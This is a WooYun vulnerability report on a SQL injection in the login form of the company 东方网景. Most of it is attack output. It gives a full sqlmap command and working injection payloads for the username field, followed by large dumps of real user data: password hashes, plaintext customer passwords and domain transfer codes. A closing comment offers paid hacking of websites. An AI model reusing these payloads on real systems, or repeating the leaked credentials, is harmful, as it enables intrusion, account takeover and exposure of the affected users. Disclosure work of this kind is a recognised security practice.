当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160623

漏洞标题:东方网景主站存在高危POST型SQL注射漏洞(大量用户密码泄露)

相关厂商:东方网景

漏洞作者: 慢慢

提交时间:2015-12-12 11:20

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-12: 细节已通知厂商并且等待厂商处理中
2015-12-16: 厂商已经确认,细节仅向厂商公开
2015-12-26: 细节向核心白帽子及相关领域专家公开
2016-01-05: 细节向普通白帽子公开
2016-01-15: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

东方网景主站存在高危POST型SQL注射漏洞(大量用户密码泄露)

详细说明:

地址:http://**.**.**.**/user/login

$ python sqlmap.py -u "http://**.**.**.**/user/login" -p username --technique=BES --output-dir=output --form --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass

漏洞证明:

---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: username=-2890' OR 2237=2237#&password=&verify=EGBB
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: username=-3369' OR 1 GROUP BY CONCAT(0x716a7a7a71,(SELECT (CASE WHEN (6586=6586) THEN 1 ELSE 0 END)),0x7170627871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=&verify=EGBB
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: username=Teuo';(SELECT * FROM (SELECT(SLEEP(5)))LxeR)#&password=&verify=EGBB
---
web application technology: Apache 2.2.22, PHP 5.3.17
back-end DBMS: MySQL 5.0.11
current user: 'user_epms@%'
current user is DBA: False
database management system users [1]:
[*] 'user_epms'@'%'
Database: epmstest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| support_Customer | 33152 |
| staff_log | 24013 |
| prima_tabLogins | 11155 |
| prima_tabMembers | 4639 |
| role_resource | 2673 |
| product_service | 1736 |
| file | 1527 |
| product_price | 950 |
| product | 726 |
| product_parameter_value | 701 |
| epms_resource | 466 |
| cms_doc | 359 |
| price | 340 |
| cms_pos_doc | 284 |
| cms_doc_product | 237 |
| product_staff | 198 |
| product_package | 172 |
| service | 140 |
| user_domain_info | 133 |
| cms_doc_news | 127 |
| cms_category | 120 |
| domain_contact | 106 |
| payment | 99 |
| staff_credit_pay | 98 |
| orders_product | 95 |
| product_parameter | 94 |
| orders | 85 |
| orders_payment | 85 |
| orders_product_copy | 77 |
| service_domain | 74 |
| role_staff | 72 |
| staff | 68 |
| cart_product | 65 |
| user_extend | 64 |
| product_category | 63 |
| ad | 57 |
| cms_pos | 55 |
| `user` | 53 |
| orders_change | 53 |
| cart | 52 |
| user_email | 45 |
| zhekou | 40 |
| renewal | 34 |
| staff_credit_recharge | 28 |
| service_function | 26 |
| cms_label | 24 |
| role | 24 |
| email_template | 19 |
| ftp_quotalimits | 18 |
| ftp_quotatallies | 18 |
| service_ftp | 18 |
| department | 17 |
| service_ftp_domain | 16 |
| special_domain | 15 |
| product_package_domain | 14 |
| article_category | 13 |
| invoice | 13 |
| service_database | 9 |
| service_email | 8 |
| service_extra | 7 |
| domain_dns | 6 |
| service_ftp_host | 6 |
| user_money_recharge | 5 |
| activity | 4 |
| question | 4 |
| service_dns | 4 |
| alipay | 3 |
| program | 3 |
| article | 2 |
| question_process | 2 |
| service_email_host | 2 |
| program_process | 1 |
| service_domain_access | 1 |
| service_package_split | 1 |
| user_money_pay | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 3111 |
| SESSION_VARIABLES | 325 |
| GLOBAL_VARIABLES | 314 |
| GLOBAL_STATUS | 287 |
| SESSION_STATUS | 287 |
| PARTITIONS | 273 |
| TABLES | 273 |
| STATISTICS | 260 |
| KEY_COLUMN_USAGE | 233 |
| TABLE_CONSTRAINTS | 231 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195 |
| COLLATIONS | 195 |
| CHARACTER_SETS | 39 |
| SCHEMA_PRIVILEGES | 30 |
| PLUGINS | 17 |
| PROCESSLIST | 11 |
| ENGINES | 6 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: epms
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| staff_log | 17482969 |
| payment | 36390 |
| support_Customer | 33150 |
| orders_product | 32662 |
| login_log | 31111 |
| service | 28812 |
| question_process | 25239 |
| orders_payment | 23872 |
| orders | 23849 |
| trade_sum | 23388 |
| user_money_pay | 22745 |
| user_data_sign | 22038 |
| service_domain | 18437 |
| service_renewal | 17446 |
| question | 15105 |
| staff_credit_pay | 14858 |
| user_domain_info | 14306 |
| staff_credit_recharge | 13763 |
| renewal | 13520 |
| prima_tabLogins | 11155 |
| orders_change | 10946 |
| file | 8843 |
| user_money_recharge | 8365 |
| invoice | 8220 |
| user_extend | 8135 |
| `user` | 8122 |
| cart_product | 6703 |
| update_password | 5693 |
| special_price | 5225 |
| ftp_quotalimits | 5037 |
| service_ftp | 5028 |
| ftp_quotatallies | 4918 |
| prima_tabMembers | 4639 |
| domain_contact | 4411 |
| user_email | 4309 |
| user_data | 4222 |
| cart | 4178 |
| domain_optrecord | 3969 |
| role_resource | 3764 |
| service_email | 3705 |
| service_ftp_domain | 2890 |
| product_service | 2282 |
| alipay | 2105 |
| trusted_sites_domain | 2075 |
| trusted_sites | 1999 |
| service_log | 1948 |
| service_database | 1699 |
| update_time_log | 1536 |
| service_expand | 1299 |
| project_order | 1194 |
| invoice_flush | 1174 |
| service_extra | 1172 |
| product_price | 1109 |
| service_upgrade | 1046 |
| crontab_log | 1023 |
| project | 977 |
| product_parameter_value | 890 |
| product | 874 |
| idcwork | 869 |
| epms_resource | 675 |
| service_changeUser | 673 |
| idc_optlog | 624 |
| cms_doc | 574 |
| dns_log | 523 |
| idc_ip | 513 |
| staff_credit_return | 507 |
| idc_server | 465 |
| idc_switchport | 425 |
| price | 416 |
| cms_pos_doc | 415 |
| service_domain_access | 415 |
| cms_doc_product | 312 |
| cms_doc_news | 267 |
| service_tongyong | 243 |
| service_package_split | 242 |
| product_staff | 225 |
| product_package | 184 |
| tongyong_domain_contact | 175 |
| special_domain | 172 |
| cms_category | 122 |
| backup_apply | 120 |
| role_staff | 120 |
| product_parameter | 109 |
| ftp_agent | 104 |
| staff | 102 |
| trusted_sites_log | 92 |
| refund | 85 |
| renewal_category | 77 |
| service_rms | 71 |
| product_category | 69 |
| cms_pos | 67 |
| trusted_sites_data | 66 |
| ad | 63 |
| achievement_adjust | 57 |
| domain_dns | 52 |
| zhekou | 42 |
| service_dns | 41 |
| service_function | 34 |
| webnic_data | 31 |
| idc_shelf | 30 |
| role | 27 |
| email_template | 26 |
| cms_label | 25 |
| department | 17 |
| trial_form | 17 |
| idc_iprange | 16 |
| product_package_domain | 14 |
| service_ftp_host | 14 |
| article_category | 13 |
| delayed_renewal | 13 |
| activity | 11 |
| program_process | 10 |
| service_trial_change | 9 |
| idc_row | 7 |
| idc_vlan | 7 |
| program | 7 |
| account | 4 |
| attorn_domain | 4 |
| service_email_host | 3 |
| article | 2 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: epmstest
Table: service_domain_access
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: epmstest
Table: service_email
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: epmstest
Table: prima_tabLogins
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(50) |
+--------+-------------+
Database: epmstest
Table: service_domain
[2 columns]
+-------------------+-------------+
| Column | Type |
+-------------------+-------------+
| password | varchar(32) |
| transfer_password | varchar(50) |
+-------------------+-------------+
Database: epmstest
Table: support_Customer
[2 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| InitPassword | varchar(16) |
| Password | varchar(16) |
+--------------+-------------+
Database: epmstest
Table: service_database
[1 column]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| database_password | varchar(255) |
+-------------------+--------------+
Database: epmstest
Table: user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: epmstest
Table: orders_access_password
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(15) |
+----------+-------------+
Database: epmstest
Table: service_ftp
[2 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| ftp_password | varchar(255) |
| init_password | varchar(255) |
+---------------+--------------+
Database: epmstest
Table: staff
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: epms
Table: service_database
[1 column]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| database_password | varchar(255) |
+-------------------+--------------+
Database: epms
Table: service_domain_access
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: epms
Table: service_email
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: epms
Table: prima_tabLogins
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(50) |
+--------+-------------+
Database: epms
Table: service_domain
[2 columns]
+-------------------+-------------+
| Column | Type |
+-------------------+-------------+
| password | varchar(32) |
| transfer_password | varchar(50) |
+-------------------+-------------+
Database: epms
Table: login_log
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: epms
Table: support_Customer
[2 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| InitPassword | varchar(16) |
| Password | varchar(16) |
+--------------+-------------+
Database: epms
Table: service_tongyong
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(15) |
+----------+-------------+
Database: epms
Table: tongyong_domain_contact
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(15) |
+----------+-------------+
Database: epms
Table: user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: epms
Table: orders_access_password
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(15) |
+----------+-------------+
Database: epms
Table: service_ftp
[2 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| ftp_password | varchar(255) |
| init_password | varchar(255) |
+---------------+--------------+
Database: epms
Table: staff
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: epmstest
Table: service_domain_access
[1 entry]
+----------+
| password |
+----------+
| 123456 |
+----------+
Database: epmstest
Table: service_email
[8 entries]
+------------+
| password |
+------------+
| 1q1s9252eb |
| 5jijg4d980 |
| 7iq0e14hjj |
| 7o05assl3r |
| bt7i3hojie |
| hnjs |
| im5jomm4s8 |
| p7nltg04qk |
+------------+


atabase: epmstest
Table: prima_tabLogins
[11155 entries]
+------------------------------------+
| passwd |
+------------------------------------+
| $1$..00810E$.elN1lI9WqZz6fTexstiq1 |
| $1$..2/j52Z$O8Qlg8.o1EB4jYtG.gREe1 |
| $1$..7/CD.X$bdgpS5SrHn1ICeZuzLhP00 |
| $1$..llAKiC$ILSycKO1BSLaat0JasQw.0 |
| $1$..VattaE$ogWpndv2EtvXBR9AO7HuE. |
| $1$./e1Lqnn$kEgykZSC6gUcRupteplVi. |
| $1$./Q/b8pu$ef6pkThDJCiYpl4t1dSeY0 |
| $1$./S5b/08$YBWFduPjOK1EiXjGYJ2ES0 |
| $1$.0//auds$wZhqCa2UrP5uEb2y6J7HI. |
| $1$.0Q1GanG$6dT479a7Svdx.gtg7tjy.. |
| $1$.0R0X1xL$TcS0.hpIcJ4/Ygl/R/wi0. |
| $1$.0X1rcZy$LbdN5RYApYPkPEHEsFwjl1 |
| $1$.0Y1gT2E$BNqG.RYivO92ZwiZho7YE0 |
| $1$.1TSzARA$C2qGxQZ7AcnLMYAOKuTSd/ |
| $1$.1y/G5BF$3h8Rkzb4MgVCzYHwjm2Ck0 |
| $1$.2F/PLea$R0TfwMIt1Zb226FYI6Pr61 |
| $1$.2m1kZb0$O1mOU9b6L/.yfRhgjZzkC0 |
| $1$.3I1vK74$7KYBmv8kM2709P5ylOop4. |
| $1$.3j/4Tfy$EpD8ycQsGRCbZglZs/Xx// |
| $1$.3J/pzAM$coWaz3FEF07HUKV1kruxq/ |
| $1$.3K08z.h$KVfTvLpUpdBqyqHQgYHwX/ |
| $1$.511Tiva$bDWU3W8EKX97PUw5zrCvb/ |
| $1$.519jHf6$Bta/3ZGQkQQeo2xa40AXN. |
| $1$.521m5t3$QZEgOof1OvLODNsNSp2Xk. |
| $1$.5B1xYkc$DnD645g5t0DUa35cPeARW/ |
| $1$.5C1ICG9$ZDyxkJpivtonE7dIu5YWz. |
| $1$.5Z04EOj$6GqSy7ENpk3qXscOtLm8o. |
| $1$.6./oIkp$9vuQRvnichXJf5FgFO2yK0 |
| $1$.6azq6jD$nMJh0qEG.ypKUQyZAR8HT. |
| $1$.6uadVk6$EwtuT2ca0NQFk318NLGFG/ |
| $1$.791rwKl$oyfZPFMhGHOICGBRvDfPg/ |
| $1$.8//BmHp$gCcJ8wOFPhQreVgyx./bZ/ |
| $1$.8A/WSs7$an6MMUpafHOwKPSEMPT841 |
| $1$.8D04UsJ$24DAl2Nh8cj632eonff6.0 |
| $1$.8I0bAco$2tdkex6mUUg01qkkEUQoJ. |
| $1$.8q/uwAh$bKzhyh1VuwYoE8k/wvqJQ1 |
| $1$.8u/Lh51$Ww/cwMlmY3pBl.PpBGwx30 |
| $1$.98EClM9$XsUsdM2Rt8iueCW4EisW.. |
| $1$.9B14aMR$VWVI3EQq3yp5xSa4Q/Zg50 |
| $1$.9e1G8Ok$5G68eJP25MruNgWpH86Jz. |
| $1$.A41tC/0$EEh1ht0RY7Hf/kwoouVSA/ |
| $1$.ad/VmAm$hJOWIftYXQmi//fuOSiGz1 |
| $1$.ah101Xj$LcPO.0ph4L4N/ZukOxZGP1 |
| $1$.ak186MH$r.EaUz6qr.ESHdeUKxRjk/ |
| $1$.ap/72SJ$pJrJktNyhDDAdOMzhMACm. |
| $1$.Ba0gdhP$4l2UYoHSsByanzIhffQce1 |
| $1$.bh0qZjJ$aFG5PFSvsEBojE/RW57DZ. |
| $1$.Bj/Kk3D$klzoQzRU4UnztYm8zjqkQ0 |
| $1$.BK06wk7$hhX6O31iCRAAMZtqrZuOP/ |
| $1$.bobuOWA$quVnzx1hXPyRIL/Nv7uUK0 |
| $1$.bu0hNkp$fz/m3GnbCh9H9aFZhPbnd1 |
| $1$.bX0Hm/7$5RGoX0728f1lh7Ih0lvQW1 |
| $1$.BY0JjMs$Z.DPsLDb/I6e1/c5WQZhg. |
| $1$.bZ0WYQi$ji0kxSVGr.Gj.XI2qVlyu. |
| $1$.c40qkTV$Za6q.Yd9wch4SgyhevE9i0 |
| $1$.Cbxmxb6$t58AyrmEkKJ41bPSMbVJu. |
| $1$.cD07t48$/UylFC5dRDdAh4oFKxUOj/ |
| $1$.cKwyT.C$AbvGcwd/mb8rFNC4rbMrQ/ |
| $1$.cU1Shfd$onRxER11b0nBnvS.X70nt/ |
| $1$.Cw/qjkR$Bpa4Pi2xCciOZL7yWXOCn. |
| $1$.d51EZiA$i5YiwPEJ766o2pj5TRjwA0 |
| $1$.d8/S4o4$KXk/SfW3vFKEBsSjcm5mA. |
| $1$.Dd0hxsy$XpsxTwmAOl1.gkwhq4Tts1 |
| $1$.Dj/ICHb$9NfulTJXqRD3Lt/q50ytm/ |
| $1$.dW/p34Y$D7ZkEXfylRXwPxOwttBI0/ |
| $1$.EAE3loE$2S4WBImA2aQ1MC2RskL.R0 |
| $1$.Ec/le/c$01kGIMzGkYS65B6I94C/S/ |
| $1$.EC1PT0h$aQpGOAGNPeKNd9K394bbF/ |
| $1$.EG//3/k$CTP2vwCsxk3lZFvRgUDPv. |
| $1$.ei1U1lg$kYMPvvFR/Jd2H0fzgMBeC1 |
| $1$.f40db89$BuMelp.zssWMH56d4t/Sn1 |
| $1$.fbStdk7$CsghvuXCsZvpgkg4pPhzF. |
| $1$.fsRTU49$cx8o/ZxaGmD/ZRPCRrPlv0 |
| $1$.FtMp80A$NLT9MVqrehdtpZdE3cZls/ |
| $1$.Gd17b.0$Yh1CzQzEMohVTguD6w2tQ1 |
| $1$.gf1JKTp$.coBZxkVcyJgdeDG2lXXG/ |
| $1$.gq/bVoQ$ohF7eHH2GJpmr0lnMl8ZC0 |
| $1$.gx0OfrV$PZnjAhd/l0CRD.o6NVcm30 |
| $1$.h5/rYZt$I/MFcJP/q3zTc06Kx7uLl0 |
| $1$.H6/ka66$5cnssdqDEAajSfa564Hms0 |
| $1$.HA./o2B$XYTB1TIm44Bl72Fhr7nn3. |
| $1$.Hi0MnxB$2weI9BRZhnNEHL2ViOgY7/ |
| $1$.hY1PotC$aNvDa/.mFmKtc27.bTvGX1 |
| $1$.IO/ZoQw$ZfijHJQinXrmLHHeZG5H.0 |
| $1$.IObhqEC$a33N71Cf59/zssFlUfJlY/ |
| $1$.irNYtx9$7q2bKOFa9KG6BImhGu6uD0 |
| $1$.IV0SNym$.yGjmOFB79NPBVfi7XE8G/ |
| $1$.ix0Wrj2$.ROGYi52xmCJ3Iojzbtz./ |
| $1$.Iy6QOcB$pXK.TPFd6RqH94s1JFmu0/ |
| $1$.J30r6Lh$pAYbEdvl/xfrpKkniqqxe/ |
| $1$.j5/bBFO$4WDMWBNKSOzMqwScUrtwn1 |
| $1$.JA/RjSh$HdJd15GzKUCo9waezrMqp1 |
| $1$.jI0brWv$z4BGiNSEvf/g45DwGHlL80 |
| $1$.jl06Son$vC27YkuEITDd1QFnMPC4q/ |
| $1$.Jw02v1Q$V4JIJqROV26PYmnayx8df. |
| $1$.Ka1zHQM$ZHuIQCKKGwkBHx7rz5bfN0 |
| $1$.KMxiqB7$wla33yvluZrO/ljBGYl/t1 |
| $1$.KW0phBd$bHNQH4n2onZ.lrBv42os./ |
| $1$.l41qUld$kBZJ/cqrIFeTPGCk6MlwU/ |
| $1$.lb1mCdM$Q0SXrQrxXFI8gw.kwy73C. |
| $1$.Lh/XknG$rlbsYNJXfnxCLwmOEbOLL0 |
| $1$.ll0If3u$fshwrSHwCZdAR8ieWERab. |
| $1$.Ln1F/fQ$kc0cjxfrA2dhE9Sggnz0K/ |


Database: epmstest
Table: service_domain
[74 entries]
+----------+-------------------+
| password | transfer_password |
+----------+-------------------+
| | 82a4ff9b |
| | gj3h3gnkmd |
| | |
| | |
| | arsfb0bq6r |
| | |
| | |
| | |
| | |
| | |
| | |
| | btfgeklmes |
| | irjet5965i |
| | si1m4anrja |
| | bbj44hp1dg |
| | |
| | |
| | |
| | |
| | a83545cb |
| | bfac3928 |
| | 2d975d57 |
| | f4207369 |
| | e7f98d7b |
| | 2a5bee05 |
| | 6a45ac65 |
| | c51ab38b |
| | 4d9dc99e |
| | fee1747f |
| | 47f00c18 |
| | 7162050e |
| | f0fd564b |
| | cd4bab83 |
| | cb18301d |
| | bda1f638 |
| | fe8fe214 |
| | nh1mbjb8jm |
| | |
| | |
| | |
| | o2ms8b20f1 |
| | me2qb84hsl |
| | |
| | ntes9qdgnd |
| | njon5g89i0 |
| | 564e4t013r |
| | h6sm6nr2jf |
| | |
| | |
| | 44b8t9a18t |
| | |
| | |
| | |
| | |
| | |
| | |
| | i4ppm1nn9s |
| | |
| | |
| | |
| | nbpqn68mbg |
| | 123456 |
| | |
| | qepnn1hl5l |
| | 2kdapl3ijn |
| | |
| | ott8rrqmer |
| | |
| | FyhpHE |
| | 464149 |
| | 6e73322e65 |
| | |
| | k6m5fdiqbo |
| | |
+----------+-------------------+
Database: epmstest
Table: support_Customer
[33152 entries]
+-------------------+------------------+
| InitPassword | Password |
+-------------------+------------------+
| | |
| | |
| | |
| | |
| dgq1967 | !2#4567* |
| !@hrg@! | !@hrg@! |
| !abc | !abc |
| gardenwio | !QAZ2wsx#EDC |
| !qnvecexoay | !qnvecexoay |
| ricki | !TRS-2011* |
| !woshibinbin? | !woshibinbin? |
| chinahil | !zhongyuan2008 |
| !zxz198 | !zxz198 |
| ha1140 | #aTch123 |
| cnpec | #c3n7p0e0* |
| cn1234 | #Cnis20O8# |
| #EDC4rfv | #EDC4rfv |
| sonicway | #SonicwayDomain |
| #thj2721576# | #thj2721576# |
| &%#369 | &%#369 |
| )(*&^%$#@! | )(*&^%$#@! |
| *#06# | *#06# |
| ***** | ***** |
| ****** | ****** |
| ****** | ****** |
| ******** | ******** |
| ******** | ******** |
| ********** | ********** |
| ***--- | ***--- |
| **63*7089 | **63*7089 |
| unicorn | *+Soo_in0??27 |
| *09205223* | *09205223* |
| 123456 | *20050630* |
| 818669 | *Abit123 |
| tsinghuazyh | *happyxu2 |
| *Iamtlql* | *Iamtlql* |
| kmhnahotel | *kmhnair* |


Database: epms
Table: service_domain_access
[415 entries]
+------------------+
| password |
+------------------+
| !1nNV$g34* |
| $idahzrx@2 |
| $idahzrx@2 |
| )gf3d*v!^? |
| ,bo42I{mc\\ |
| 03pt3qe22b |
| 05eh5e54o0 |
| 05SdZ6BM/y |
| 05SdZ6BM/y |
| 08laqptom9 |
| 0gbjme7s5k |
| 0ia6426jl5 |
| 0j2s=lR*d[ |
| 0lr10hb2ob |
| 0o64293m01 |
| 0r4nm9metn |
| 0t5qlikgne |
| 0tnp2lqtq6 |
| 1(c:,62vio |
| 10006277 |
| 10t168d5jb |
| 11ttKb!RI2 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |
| 123456 |


Database: epms
Table: prima_tabLogins
[11155 entries]
+------------------------------------+
| passwd |
+------------------------------------+
| $1$..00810E$.elN1lI9WqZz6fTexstiq1 |
| $1$..2/j52Z$O8Qlg8.o1EB4jYtG.gREe1 |
| $1$..7/CD.X$bdgpS5SrHn1ICeZuzLhP00 |
| $1$..llAKiC$ILSycKO1BSLaat0JasQw.0 |
| $1$..VattaE$ogWpndv2EtvXBR9AO7HuE. |
| $1$./e1Lqnn$kEgykZSC6gUcRupteplVi. |
| $1$./Q/b8pu$ef6pkThDJCiYpl4t1dSeY0 |
| $1$./S5b/08$YBWFduPjOK1EiXjGYJ2ES0 |
| $1$.0//auds$wZhqCa2UrP5uEb2y6J7HI. |
| $1$.0Q1GanG$6dT479a7Svdx.gtg7tjy.. |
| $1$.0R0X1xL$TcS0.hpIcJ4/Ygl/R/wi0. |
| $1$.0X1rcZy$LbdN5RYApYPkPEHEsFwjl1 |
| $1$.0Y1gT2E$BNqG.RYivO92ZwiZho7YE0 |
| $1$.1TSzARA$C2qGxQZ7AcnLMYAOKuTSd/ |
| $1$.1y/G5BF$3h8Rkzb4MgVCzYHwjm2Ck0 |
| $1$.2F/PLea$R0TfwMIt1Zb226FYI6Pr61 |
| $1$.2m1kZb0$O1mOU9b6L/.yfRhgjZzkC0 |
| $1$.3I1vK74$7KYBmv8kM2709P5ylOop4. |
| $1$.3j/4Tfy$EpD8ycQsGRCbZglZs/Xx// |
| $1$.3J/pzAM$coWaz3FEF07HUKV1kruxq/ |
| $1$.3K08z.h$KVfTvLpUpdBqyqHQgYHwX/ |
| $1$.511Tiva$bDWU3W8EKX97PUw5zrCvb/ |
| $1$.519jHf6$Bta/3ZGQkQQeo2xa40AXN. |
| $1$.521m5t3$QZEgOof1OvLODNsNSp2Xk. |
| $1$.5B1xYkc$DnD645g5t0DUa35cPeARW/ |
| $1$.5C1ICG9$ZDyxkJpivtonE7dIu5YWz. |
| $1$.5Z04EOj$6GqSy7ENpk3qXscOtLm8o. |
| $1$.6./oIkp$9vuQRvnichXJf5FgFO2yK0 |
| $1$.6azq6jD$nMJh0qEG.ypKUQyZAR8HT. |
| $1$.6uadVk6$EwtuT2ca0NQFk318NLGFG/ |
| $1$.791rwKl$oyfZPFMhGHOICGBRvDfPg/ |
| $1$.8//BmHp$gCcJ8wOFPhQreVgyx./bZ/ |
| $1$.8A/WSs7$an6MMUpafHOwKPSEMPT841 |
| $1$.8D04UsJ$24DAl2Nh8cj632eonff6.0 |

修复方案:

上WAF。

版权声明:转载请注明来源 慢慢@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-12-16 19:06

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT发其信息安全管理部门,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-22 05:42 | 子非鱼 ( 实习白帽子 | Rank:31 漏洞数:14 )

    请问大牛要赚些外快吗,拿些简单的站,都是权重站或者新闻源,请加我QQ 123822416 谈